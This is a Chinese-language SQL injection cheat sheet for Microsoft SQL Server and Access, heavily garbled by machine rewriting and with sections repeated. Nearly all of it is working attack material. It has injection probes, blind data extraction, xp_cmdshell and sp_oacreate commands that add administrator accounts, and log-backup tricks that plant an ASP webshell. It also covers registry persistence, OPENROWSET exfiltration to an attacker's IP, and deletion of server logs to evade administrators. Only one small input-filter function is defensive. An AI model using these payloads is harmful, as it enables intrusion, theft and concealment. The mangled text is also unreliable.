select * from NetBook.dbo.syscolumns where id=object_id(’book’) --查询book表里的字段

 


在MSSQL3000中提供了有的函数用于访谈OLE对象间接获取权力:

---------------------------------------SQL扩充沙盘提权-----------------------------------

;declare @s int

看来xp_cmdshell是不能够用鸟~ 不过偶们还应该有SP_O Acreate能够用用SP_OAcreate相同能够试行系统命令
在询问深入分析器里实行
DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:WINdowssystem32cmd.exe /c net user gydyhook hook /add&rsquo ;
这段代码便是利用SP_OAcreate来加多一个gydyhook的系统客商然后直接进级为大班权限就OK了
提示命令实现有功

;exec sp_oacreat 'wscript.shell',@s

直接写
个一句话进去
语句如下
exec master.dbo.xp_subdirs ’d:webwww. xx.com’;
exec sp_makewebtask ’d:webwww.XXXX.comXX.asp’,’select’’’’ ’
晋升命令推行成功偶 们看看效果

;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:'

询问剖判器里进行select * from openrowset(’microsoft.jet.oledb.4.0’,’
;database=c:windowssystem32iasias.mdb’,
’select shell("cmd.exe /c net user admin admin1234 /add")’)来使用沙盘来增添个管理员 不过真实景况报告
我 我 的RP并不好

 

嘿嘿 使用declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’d:Serv-U6.3ServU Daemon.ini’, 1
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
这段代码就能够把ServUDaemon.ini里的布署音信全体展示出来 嘿嘿 既然能看了那偶门不是同等能够写进去?
间接写二个体系权限的FTP帐号 进去
使用declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
ex ec sp_oamethod @o, ’createtextfile’, @f out, ’d:Serv-U6.3ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自身写好的SU配置消息刚才复制的这多少个都要
写上去》
接下来推行一下 成功施行 大家再用存款和储蓄进度看看写进去没有
OK 小编XXXXXX 成功写 进去了二个顾客名叫XXXX密码为空的系统权限的FTP 然后偶们在FTP里实施
quote siteXXXXXXX 提权就好了。 这里曾经很熟练了 就不写了。~ 然后用3389连一下 成功地到服务器权限
接下来偶们再用set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int 来清理掉SQL日志 免的被管理员发掘

推断当前数据库顾客名是不是享有相比高的权能:


and 1=(select is_srvrolemember('sysadmin'))

DE CLARE @cmd INT EXEC sp_oacreate 'wscript.shell',@cmd output

and 1=(select is_srvrolemember('serveradmin'))

EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$Content$nbsp;test /add&a

and 1=(select is_srvrolemember('setupadmin'))

------------------------------MSSQL

and 1=(select is_srvrolemember('securityadmin'))

db_owner注入利用xp_regwrite得到系统权限----------------

xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowscurrentversionrun’,’xwq1’,’REG_SZ’,’net user h86$ hacker /add’

呵呵,再次来到七个正规页面,表达成功做到 拉,再在注射点输入

xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowscurrentversionrun’,’xwq2’,’REG_SZ’,’net localgroup administrators h86$ /add’


  轻易的如where xtype=’U’,字符U对应的ASCII码是85,所以能够用where xtype=char(85)替代;

借使字符是 中文的,举个例子where name=’客商’,能够用where name=nchar(29992) nchar(25143)替代。

-------------------------------------------备份一句话木马----------------------------------------

日志备分WEBSHELL标准的七步:

1.InjectionU奥德赛L’;alter databas e XXX set RECOVE奥迪Q5Y FULL-- (把SQL设置成日志完全恢复形式)

2.InjectionULANDL’;create table cmd (a image)-- (新创立三个cmd表)

3.InjectionU中华VL’;backup log XXX to disk = ’c:cmd’ with init-- (收缩备分数据的高低)

4.InjectionU途睿欧L’;in sert into cmd (a) values (’’)-- (插入一句话木马)

5.InjectionU纳瓦拉L’;backup log XXX to disk = ’d:chinakmtest.asp’-- (备分日志到WEB路径)

6.InjectionU大切诺基L’;drop table cmd-- (删除新建的cmd表)

7.InjectionU传祺L’;a lter database XXX set RECOVE中华VY SIMPLE--(把SQL设置成日志轻松复苏方式)

注:InjectionU凯雷德L是注入点,XXX是数据库名称.

数据库差别备份代码:
BACKUPLOGpeihuaWITHNO_LOGDBCCSHRINKDATABASE(peihua)--

dumptransactionpeihuawithno_log--
0.dump transaction 数据库名 wi th no_log 清空日志

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 成立一个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制调换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 ""的16进制字符插入到表中

4、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’Crogram FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库进行差距备份,备份的保存路线暂定为C盘目录,文件名字为hsqq.asp。

5、drop table [jm_tmp]-- 删除此表。

---------------------------------------------------防--------------------------------------------

Function SafeRequest(ParaName,ParaType)
 ’ --- 传入参数 ---
 ’ParaName:参数名称-字符型
 ’ParaType:参数类型-数字型(1意味着以上参数是数字,0意味以上参数为字符)

 Dim Paravalue
 Paravalue=Request(ParaName)
 If ParaType=1 then
  If not isNumeric(Paravalue) then
   Response.write "参数" & ; ParaName & "必得为数字型!"
   Response.end
  End if
 Else
  Paravalue=replace(Paravalue,"’","’’")
 End if
 SafeRequest=Paravalue
End function

-- 绕过单引号继续注入

U奥迪Q5L;declare @cmd sy sname select @cmd=这里为你要实行命令的16进制 exec master.dbo.xp_cmdshell @cmd;--

--先声圣元(Synutra)个变量cmd,然后把我们的通令赋值给cmd

--sql server 2005下开启xp_cmdshell的办法

EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure &rs quo;xp_cmdshell’, 1;RECONFIGURE;

--SQL二零零五张开’OPENROWSET’帮助的办法:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ad Hoc Distributed Queries’,1;RECONFIGURE;

--SQL2005开启’sp_oacreate’帮助的秘籍:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ole Automation Procedures’,1;RECONFIGURE;

在db权限并且分离获取mssql数据库服务器ip的艺术

1.本地nc监 听 nc -vvlp 80

2.;insert into OPENROWSET(’SQLOLEDB’,’uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的 ip,80;’, ’select * from dest_table’) select * from src_table;--

---------------------------------以下为检查测量检验方法---------------------------------

and 1=(select is_srvrolemember('diskadmin'))

--检查评定是或不是注入

====================
URubiconL and 1=1;--不荒谬页面
U瑞鹰L and 1=2;--出错页面

=============================================================================
--检查测量检验数据库的
=============================================================================< br />URL and (select count(*) from sysobjects)>0;--重返寻常sql server
URL and (select count(*) from msysobjects)>0;--再次回到平常Access

=============================================================================

and 1=(select is_srvrolemember('bulkadmin'))

--检查测验路线的

================================================================
URL and (select count(*) from master.dbo.sysdatabases where name>0 and dbid=6)>0;--

=============================================================================

 

- -检测表段的

URL and exists (select * from admin);--

=============================================================================

看清当前数据库客户名是不是为DB_OWNER:

--检查实验字段的

================================================================
URL and exists (select username from admin) ;--

=============================================================================

and 1=(select is_member('db_owner'))

--检测ID

==============================================
URL and exists (select id from admin where ID=1) ;--

=============================================================================

 

--检查评定长度的

==================================
URL and exists (select id from admin where len(username)=5 and ID=1);--

=============================================================================

在SQLSE汉兰达VE凯雷德的master.dbo.sysdatabases表中贮存着SQLSE揽胜VE路虎极光数据库系统中的全体数据库新闻,只须要PUBLIC权限就能够对此表实行SELECT操作:

--检验是或不是为MSSQL数据库

=================================================
URL and exists (select * from sysobjects) ;--

=============================================================================

and (select top 1 name from master.dbo.sysdatabase order by dbid)>0

--检验是不是为阿尔巴尼亚语 ;--

====================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1);-- ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) betwee n 30 and 130 and ID=1) ;--MSSQL数据库

=============================================================================

and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

--检查实验乌克兰语的界定

URL and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1);--MSSQL数据库

 

================================

剔除日志记录:

--检查实验这个字符

URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1);--MSSQL数据库

例如说在询问id是50的数目时,如若客户传近些日子的参数是50 and 1=1,若无设置过滤的话,可以一贯查出来,SQL 注入日常在ASP程序中相见最多,

造访上面的
1.论断是或不是有注入
;and 1=1
; and 1=2

2.开端决断是或不是是mssql
;and user>0

3.论断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.流入参数是字符
'and [查询条件] and ''='

5.搜索时没过滤参数 的
'and [查询条件] and '%'='

6.猜数据库
;and (select Count(*) from [数码库名])>0

7.猜字段
;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(acc ess)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测验权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1 =(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulka dmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

11.增添mssql和体系的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步获得的paths'))>)

(2)遍历目录
;create table te mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前颇负驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 拿到子目录列表
;insert into temp(id,num1) exec m aster.dbo.xp_dirtree 'c:';-- 得到全数子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

13.mssql中的存款和储蓄进程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicr osoftWindowsCurrentVersionRun' 以七个记录集格局赶回全部键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir' 重返制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWO昂CoraD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestvalueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersio n','TestvalueName' 删除有些值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包蕴该键下全体值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('') ;
backup database model to disk='c:l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的本子号
;and user_name()='dbo' 剖断当前系统的延续客户是还是不是sa
;and (select user_name())>0 爆当前系统的连年客商
;and (select db_name())>0 获得当前接连的数 据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';

伸手的时候,像那标准用:

SQL手工业注入大全

前提需求工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩大进程的章程是运用如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell扩充进度的形式是使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlEx ec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

SQL手工业注入方法计算(SQL Server2006)2008-01-28 16:17---------以下以简练注入点用UXC60L代替

--(1) ******查阅驱动器方法******

-- 建表p(i为自动编号,a记录盘符类似"c:",b记录可用字节,别的省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar( 255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出装有驱动器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驱动器总量

UCRUISERL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

--上边常常用于无显错意况下选拔-------依此类推,获得全数驱动器名

ULacrosseL;and (select a from p where i=1)>3;--报错获得第一个驱动器名

--上面平时用于显错境况下选拔-------依此类推,得到全部驱动器名

URL;;drop table p;--删除表p

--(2) ******查看目录方法******

U奥德赛L;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

澳门新浦京娱乐场网站,URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

U奥迪Q7L;and (select top 1 m from pa where i=1 an d m not in(select top 0 m from pa))>0;--报错获得深度i=1的首先个目录名

--上边平时用显错且目录名不为数字意况下利用-------(获得第3个目录把"top 0"换为"top 1",换深度只换i就行)由此及彼,获得e盘的有所目录

U兰德路虎极光L;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半 法查出深度i=1的第三个目录名的长短

UENVISIONL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第二个目录名的第3个字符长度

--上边经常用无显错意况下利用-------(得到第1个目录把"top 0"换为"top 1",换深度只换i就行)就那样推算,得到e盘的具有目录

URL;drop table pa;--删除表pa

;exec master.dbo.xp_cmdshell 'del c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt'

----------------------------经过地点的措施就可获取服务器全部目录(这里为连日来顾客有读取权限目录)-----

--(3) 数据库备份到Web目录(先拿个WebShell再说呢 注:此为SQL Server三千)

URL;alter database employ_ set RECOVE宝马X5Y FULL;--把当前库L设置成日志完全复苏情势

URL;URL;create table s(l image);--建表s

U福睿斯L;backup log s to disk = ’c:cmd&rsq uo; with init;--减弱备分数据的分寸

U逍客L;U安德拉L;insert s values(’’)--在表s中插入一句话马

URL;backup log hh to disk = ’e:webg.asp’;--备分日志到WEB路线

URL;drop table s;--删除表s

U本田CR-VL;alter database hh set RECOVETiggoY SIMPLE ;--把SQL设置成日志轻易恢复生机情势

--------------------------------------OK到此WebShell应该获得了-----------------------------------------------

--(4) 以下为局地注入杂项

----SA权限:

URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户

URL; exec master.dbo.sp_password null,黑客,红客;--设置SQL帐号红客的密码为 红客

RL;exec master.dbo.sp_addsrvrolemember sysadmin hacker;--加hacker进sysadmin管理组

URL;exec master.dbo.xp_cmdshell ’net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--建设构造二个体系用红客 并安装其密码为红客

URL;exec master.dbo.xp_cmdshell ’net localgroup administrators 骇客/add’;--黑客参与到管理员组

----SQL Server二〇〇七暴库、表、段法(前提有显错、无显错用折半法)

URL and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数

URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

--依次提交 dbid = 2.3.4... 获得越来越多的数据库名

URL and 0<(select count(*) name from employ.dbo.sysobjects where xtype=’U’);--折半法得到表个数(要是暴出库名employ)

URL and 0<(select top 1 name from employ.dbo.sysobjects where xtype=’U’)

-- 借使暴出表名称为"employ_qj"则在地方语句上加条件 and name not in (’employ_qj’ 以此直接加条件....

URL and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = ’u’ and name = ’employ_qj’));--

--若是暴出字段名称叫"id"则在地点语句上助长条件 and name not is(’id’) 以此一直加条件....

---------------------按下面方法库、表、段的名目都得以收获----用以上办法能够收获段段里的数据--------------------
select * from master.dbo.sysdatabases --查询数据库

select * from NetBook.dbo.sysobjects where xtype=’u’ --查询数据库NetBook里的表

select * from NetBook.dbo.syscolumns where id=object_id(’book’) --查询book表里的字段


---------------------------------------SQL扩充沙盘提权-----------------------------------

看来xp_cmdshell是无法用鸟~ 可是偶们还会有SP_O Acreate能够用用SP_OAcreate同样能够进行系统命令
在查询剖析器里实践
DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:WINdowssystem32cmd.exe /c net user gydyhook hook /add&rsquo ;
这段代码正是利用SP_OAcreate来加多二个gydyhook的连串客商然后平昔升高为总指挥权限就OK了
提拔命令实现成功

直接写
个一句话进去
语句如下
exec master.dbo.xp_subdirs ’d:webwww. xx.com’;
exec sp_makewebtask ’d:webwww.XXXX.comXX.asp’,’select’’’’ ’
提示命令推行成功偶 们看看效果

查询解析器里实践select * from openrowset(’microsoft.jet.oledb.4.0’,’
;database=c:windowssystem32iasias.mdb’,
’select shell("cmd.exe /c net user admin admin1234 /add")’)来行使沙盘来增多个管理员 然而实际报告
我 我 的RP并不好

嘿嘿 使用declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’d:Serv-U6.3ServU Daemon.ini’, 1
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
这段代码就可以把ServUDaemon.ini里的配备音信全体出示出来 嘿嘿 既然能看了那偶门不是同样能够写进去?
直白写八个种类权限的FTP帐号 进去
使用declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’createtextfile’, @f out, ’d:Serv-U6.3ServUD aemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写本人写好的SU配置消息刚才复制的那三个都要
写上去》
然后实践一下 成功进行 大家再用存储进程看看写进去未有
OK 作者XXXXXX 成功写进去了三个客户名叫XXXX密码为空的系统权限的FTP 然后偶们在FTP里实行
quote siteXXXXXXX 提权就好了。 这里已经很熟谙了 就不写了。 ~ 然后用3389连一下 成功地到服务器权限
然后偶们再用set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int 来清理掉SQL日志 免的被管理员发掘


DECLARE @cmd INT EXEC sp_oacreate 'wscript.shell',@cmd output

EXEC sp_oame thod @cmd,'run',null,'cmd.exe /c net user renwoxin$Content$nbsp;test /add&a

------------------------------MSSQL db_owner注入利用xp_regwrite获得系统权限---------------------------------------

xp_regwrite ’HKEY_LOCAL_MACHINE’,&rs quo;SOFTWAREMicrosoftWindowscurrentversionrun’,’xwq1’,’REG_SZ’,’net user h86$ hacker /add’

呵呵,重返三个常规页面,表达成功完毕拉,再在注射点输入

xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowscurrentversionrun’,’xwq2’,’REG_SZ’,’net localgroup administrators h86$ /add’


  轻易的如where xtype=’U’,字符U对应的ASCII码是85,所以能够用where xtype=char(85)替代;

一经字符是 普通话的,比方where name=’客商’,可以用where name=nchar(29992) nchar(25143)替代。

-------------------------------------------备份一句话木马----------------------------------------

日志备分WEBSHELL标准的七步:

1.InjectionURAV4L’;alter databas e XXX set RECOVEAMG GTY FULL-- (把SQL设置成日志完全复苏情势)

2.InjectionUTucsonL’;create table cmd (a image)-- (新建构一个cmd表)

3.InjectionULX570L’;backup log XXX to disk = ’c:cmd’ with init-- (裁减备分数据的尺寸)

4.InjectionUCRUISERL’;in sert into cmd (a) values (’’)-- (插入一句话木马)

5.InjectionUOdysseyL’;backup log XXX to disk = ’d:chinakmtest.asp’-- (备分日志到WEB路线)

6.InjectionU智跑L’;drop table cmd-- (删除新建的cmd表)

7.InjectionU安德拉L’;a lter database XXX set RECOVE路虎极光Y SIMPLE--(把SQL设置成日志轻巧苏醒情势)

注:InjectionU大切诺基L是注入点,XXX是数据库名称.

数据库差别备份代码:
BACKUPLOGpeihuaWITHNO_LOGDBCCSHRINKDATABASE(peihua)--

dumptransactionpeihuawithno_log--
0.dump transaction 数据库名 wi th no_log 清空日志

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创立五个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制调换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 ""的16进制字符插入到表中

4、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’Crogram FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差距备份,备份的保存路线暂定为C盘目录,文件名称叫hsqq.asp。

5、drop table [jm_tmp]-- 删除此表。

---------------------------------------------------防--------------------------------------------

Function SafeRequest(ParaName,ParaType)
 ’ --- 传入参数 ---
 ’ParaName:参数名称-字符型
 ’ParaType:参数类型-数字型(1意味以上参数是数字,0表示以上参数为字符)

 Dim Paravalue
 Paravalue=Request(ParaName)
 If ParaType=1 then
  If not isNumeric(Paravalue) then
   Response.write "参数" & ; ParaName & "必需为数字型!"
   Response.end
  End if
 Else
  Paravalue=replace(Paravalue,"’","’’")
 End if
 SafeRequest=Paravalue
End function

-- 绕过单引号继续注入

UENCOREL;declare @cmd sy sname select @cmd=这里为你要实施命令的16进制 exec master.dbo.xp_cmdshell @cmd;--

--先声明一(Wissu)(Karicare)(Beingmate)个变量cmd,然后把大家的下令赋值给cmd

--sql server 2005下开启xp_cmdshell的办法

EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure &rs quo;xp_cmdshell’, 1;RECONFIGURE;

--SQL二〇〇五开启’OPENROWSET’扶助的秘技:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ad Hoc Distributed Queries’,1;RECONFIGURE;

--SQL2005开启’sp_oacreate’援助的艺术:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ole Automation Procedures’,1;RECONFIGURE;

在db权限並且分离获取mssql数据库服务器ip的格局

1.本地nc监 听 nc -vvlp 80

2.;insert into OPENROWSET(’SQLOLEDB’,’uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的 ip,80;’, ’select * from dest_table’) select * from src_table;--

---------------------------------以下为检查实验方法---------------------------------

 

--检查评定是不是注入

====================
UTiguanL and 1=1;--平常页面
UEvoqueL and 1=2;--出错页面

=============================================================================
--检查评定数据库的
=============================================================================< br />URL and (select count(*) from sysobjects)>0;--再次来到符合规律sql server
URL and (select count(*) from msysobjects)>0;--重回寻常Access

=============================================================================

轮换日志记录:

--质量评定路线的

================================================================
URL and (select count(*) from master.dbo.sysdatabases where name>0 and dbid=6)>0;--

=============================================================================

;exec master.dbo.xp_cmdshell 'copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c:temp.txt'

- -检查实验表段的

URL and exists (select * from admin);--

=============================================================================

 

--检查实验字段的

================================================================
URL and exists (select username from admin) ;--

=============================================================================

获取WEB路径:

--检测ID

==============================================
URL and exists (select id from admin where ID=1) ;--

=============================================================================

;declare @shell int

--检查测量试验长度的

==================================
URL and exists (select id from admin where len(username)=5 and ID=1);--

=============================================================================

;exec master..sp_oamethod 'wscript.shell',@shell out

--检查测验是不是为MSSQL数据库

=================================================
URL and exists (select * from sysobjects) ;--

=============================================================================

;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /s d:/index.asp >c:/log.txt

--检查实验是或不是为乌克兰语 ;--

====================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1);-- ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) betwee n 30 and 130 and ID=1) ;--MSSQL数据库

=============================================================================

 

--检验葡萄牙共和国(República Portuguesa)语的限制

URL and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1);--MSSQL数据库

利用XP_CMDSHELL搜索:

================================

;exec master..xp_cmdshell 'dir /s d:/index.asp'

--检验那么些字符

URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1);--MSSQL数据库

 

 

来得服务器网址配置音讯命令:

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root

 

利用XP_REGREAD可用PUBLIC权限读取:

;exec master.dbo.xp_regread

hkey_local_machine,

'systemcurrentcontrolsetservicesw3svcparametersvirtual roots'

'/'

 

SQLSE帕杰罗VELAND下的高级级手艺能够参见阅读曾云好所著的明白脚本骇客第五章。

 

3、DSqlHelper

 

检测权限SYSADMIN:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。

 

检测XP_CMDSHELL(CMD命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

检测XP_REGREAD(注册表读取成效):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')

检测SP_MAKEWEBTASK(备份效能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')

检测SP_ADDEXTENDEDPROC:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')

检测XP_SUBDI库罗德S读子目录:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')

检测XP_DIRTREE读子目录:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')

 

修改内容:

; UPDATE 表名 set 字段=内容 where 1=1

 

XP_CMDSHELL检测:

;exec master..xp_cmdshell 'dir c:'

修复XP_CMDSHELL:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

用XP_CMDSHELL增添顾客黑客:

;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

XP_CMDSHELL把用户hacker加到ADMIN组:

;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

 

创建表test:

;create table [dbo].[test] ([dstr][char](255));

检查实验表段test:

and exists (select * from test)

读取WEB的地点(读注册表):

;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots', '/',@result output insert into test (dstr) values(@result);--

爆出WEB的相对路线(显错形式):

and 1=(select count(*) from test where dstr > 1)

删除表test:

;drop table test;--

 

创办查看目录的表dirs:

;create table dirs(paths varchar(100), id int)

把查看目录的始末参加表dirs:

;insert dirs exec master.dbo.xp_dirtree 'c:'

爆目录的剧情dirs:

and 0<>(select top 1 paths from dirs)

备份数据库DATANAME:

declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:inetpubwwwrootdown.bak';--

删除表dirs:

;drop table dirs;--

 

创建表temp:

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

把驱动盘列表参加temp表:

;insert temp exec master.dbo.xp_availablemedia;--

删除表temp:

;delete from temp;--

 

创建表dirs:

;create table dirs(paths varchar(100), id int);--

赢得子目录列表XP_SUBDIRS:

;insert dirs exec master.dbo.xp_subdirs 'c:';--

露马脚内容(显错形式):

and 0<>(select top 1 paths from dirs)

删除表dirs:

;delete from dirs;--

 

创建表dirs:

;create table dirs(paths varchar(100), id int)--

用XP_CMDSHELL查看目录内容:

;insert dirs exec master..xp_cmdshell 'dir c:'

删除表dirs:

;delete from dirs;--

 

检测SP_OAcreate(施行命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')

SP_OAcreate执行CMD命令:

